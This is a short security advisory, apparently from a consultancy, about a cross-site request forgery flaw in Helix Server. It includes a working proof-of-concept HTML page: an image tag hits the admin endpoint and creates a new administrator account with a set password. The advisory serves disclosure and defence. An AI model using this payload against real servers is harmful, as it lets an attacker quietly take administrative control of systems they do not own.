Home
Consulting
Advisories
Software
Articles
Contact

Helix Server Cross-site Request Forgery

Legacy Advisories

Description

A cross-site request forgery vulnerability in Helix Server can be exploited to create a new admin.

Proof Of Concept

<html>
    <body>
        <img src="http://testbox:15257/admin/auth.adduser.html?respage=config_results.nc.html&name=new_admin&pass=Password1&realm=TESTBOX.AdminRealm" />
    </body>
</html>


Copyright © 2018 AutoSec Tools LLC